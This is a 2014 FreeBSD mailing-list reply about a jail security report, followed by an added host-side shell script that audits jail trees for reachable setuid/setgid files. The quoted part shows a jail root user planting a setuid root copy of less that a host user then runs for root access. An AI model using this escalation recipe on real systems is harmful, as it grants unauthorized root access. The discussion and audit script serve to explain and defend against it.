misc/187307: Security vulnerability with FreeBSD Jail

James Gritton jamie at freebsd.org
Thu Mar 6 00:54:44 UTC 2014


On 3/5/2014 4:39 PM, Xin Li wrote:

 > This is NOT a problem with jail.  For starters, it's a very bad idea to
 > give out a host shell account, privileged or not, to jail users if they
 > are not trusted.  Let's consider this scenario:
 >
 > jail$ su -l
 > jail# cp /usr/bin/less /bin/root_shell
 > jail# chown root:wheel /bin/root_shell
 > jail# chmod 6555 /bin/root_shell
 > jail# logout
 > jail$ logout
 >
 > Then, you basically have a setuid binary that can be reached from host
 > system.  As an attacker I would do:
 >
 > host$ /path/to/jail/bin/root_shell

That's an important point: jails are good for their *own* security,
but they make the base system insecure for allowing untrusted users.
I can see user accounts for the admin's own use (likely the condition
that was originally reported), but that's the only account I would
consider allowing.

- Jamie
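
A host-side audit for the situation discussed in this message, as an added example that is not part of the original thread: it lists setuid/setgid files under a jail root and reports whether unprivileged host users can reach each one. The function names are hypothetical, and the jail root you pass in stands for the thread's `/path/to/jail` placeholder.

```shell
#!/bin/sh
# Added example: audit a jail tree from the host for setuid/setgid files
# that unprivileged host users could execute. Function names are hypothetical.

# Print every regular file under $1 that has the setuid or setgid bit set.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Succeed if "other" has the x bit on $1 and on every directory above it,
# up to and including $2 (default /), i.e. any host user can walk the path.
other_can_reach() {
    p=$1
    top=${2:-/}
    while :; do
        # 10th character of the ls mode string is the "other" execute slot:
        # x or t means allowed, - or T means denied.
        case $(ls -ld -- "$p" | cut -c10) in
            x|t) ;;
            *) return 1 ;;
        esac
        case $p in
            "$top"|/|.) return 0 ;;
        esac
        p=$(dirname -- "$p")
    done
}

# Report each setuid/setgid file under jail root $1 as REACHABLE or
# RESTRICTED from the host. $2 optionally bounds the upward walk.
audit_jail() {
    list_setid "$1" | while IFS= read -r f; do
        if other_can_reach "$f" "${2:-/}"; then
            echo "REACHABLE $f"
        else
            echo "RESTRICTED $f"
        fi
    done
}

# Run as: sh audit.sh <jail-root>
if [ "$#" -gt 0 ]; then
    audit_jail "$@"
fi
```

A RESTRICTED result means some component of the path denies access to "other"; it says nothing about host accounts that match the owner or group of that component.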

